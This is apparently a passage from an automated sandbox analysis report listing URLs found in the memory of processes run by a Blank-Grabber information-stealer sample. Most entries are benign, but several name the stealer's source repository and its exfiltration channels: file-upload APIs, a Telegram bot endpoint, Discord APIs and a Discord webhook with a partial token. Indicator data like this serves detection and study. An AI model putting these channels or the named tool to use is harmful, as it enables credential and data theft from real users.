              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: cmd.exeString found in binary or memory: http://ocsp.sectigo.com0$
              Source: cmd.exe, 00000000.00000002.2112093875.00000162C4338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigoc
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 0000002A.00000002.1859004442.000002168E3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 0000000A.00000002.1861065562.0000022BDCBE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 0000000A.00000002.1861065562.0000022BDC9C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1859004442.000002168CAC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000A.00000002.1861065562.0000022BDCBE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: cmd.exe, 00000001.00000002.2098765612.000001C916E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 0000002A.00000002.1859004442.000002168E115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 0000002A.00000002.1859004442.000002168E3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: cmd.exe, 00000001.00000002.2096563852.000001C916813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: powershell.exe, 0000002A.00000002.1920794731.00000216A4D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: cmd.exe, 00000001.00000002.2098403824.000001C916CB7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1794009198.000001C916CB6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C917A04000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1936188709.000001C916CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: cmd.exe, 00000001.00000002.2100068134.000001C917A74000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 0000000A.00000002.1861065562.0000022BDC9C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1859004442.000002168CAC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadrU
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr;
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr;r
              Source: cmd.exe, 00000001.00000003.1936488161.000001C916CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.stripe.com/v
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/%s
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/%s)
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/%sp
              Source: cmd.exe, 00000001.00000002.2100068134.000001C917A04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 0000002A.00000002.1908083358.000002169CB3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000002A.00000002.1908083358.000002169CB3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000002A.00000002.1908083358.000002169CB3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: cmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1309732604697772032/jYDmGek7yWvABusaZDozvumeMuAZjheHcNL9cOnpMCpam2e
              Source: cmd.exe, 00000001.00000002.2098529870.000001C916CF7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1936488161.000001C916CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1705592637.000001C914409000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1705592637.000001C914409000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1705592637.000001C914409000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1705592637.000001C914409000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1705592637.000001C914409000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: cmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: svchost.exe, 0000001C.00000003.1775846241.00000240CA8C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
              Source: edb.log.28.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
              Source: edb.log.28.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
              Source: edb.log.28.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: svchost.exe, 0000001C.00000003.1775846241.00000240CA8C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.28.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-GrabberrU
              Source: cmd.exe, 00000001.00000003.1711260677.000001C916970000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1712399231.000001C916970000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1711786207.000001C916970000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1711452846.000001C916D3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 0000002A.00000002.1859004442.000002168E3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: cmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: cmd.exe, 00000001.00000002.2097860677.000001C9169B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: cmd.exe, 00000001.00000002.2098765612.000001C916E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: cmd.exe, 00000001.00000002.2098872517.000001C916F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
              Source: powershell.exe, 0000002A.00000002.1859004442.000002168D998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096563852.000001C916829000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2092429001.000001C916827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096563852.000001C916829000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2092429001.000001C916827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: cmd.exe, 00000001.00000002.2097860677.000001C9169B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: cmd.exe, 00000001.00000002.2096563852.000001C916730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: cmd.exe, 00000001.00000002.2100068134.000001C917A5C000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C79000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C917A58000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 0000000A.00000002.1921700261.0000022BECA36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908083358.000002169CC80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1859004442.000002168E42F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908083358.000002169CB3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: svchost.exe, 0000001C.00000003.1775846241.00000240CA8C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
              Source: edb.log.28.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
              Source: powershell.exe, 0000002A.00000002.1859004442.000002168E115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 0000002A.00000002.1859004442.000002168E115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: cmd.exe, 00000001.00000002.2098872517.000001C916F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2098765612.000001C916E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: cmd.exe, 00000001.00000002.2103718969.00007FFDFB784000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
              Source: cmd.exe, 00000001.00000003.1772966078.000001C91692E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1788462213.000001C91692E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: cmd.exe, 00000001.00000003.1758937487.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1788462213.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1758937487.000001C91688E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: cmd.exe, 00000001.00000003.1758937487.000001C9168E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: cmd.exe, 00000001.00000003.1788462213.000001C9168E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
              Source: cmd.exe, 00000001.00000002.2096102942.000001C916430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: cmd.exe, 00000001.00000002.2096102942.000001C9164F1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: cmd.exe, 00000001.00000002.2098765612.000001C916E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: cmd.exe, 00000001.00000002.2098872517.000001C916F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: cmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsC
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C917A04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
              Source: cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
              Source: cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
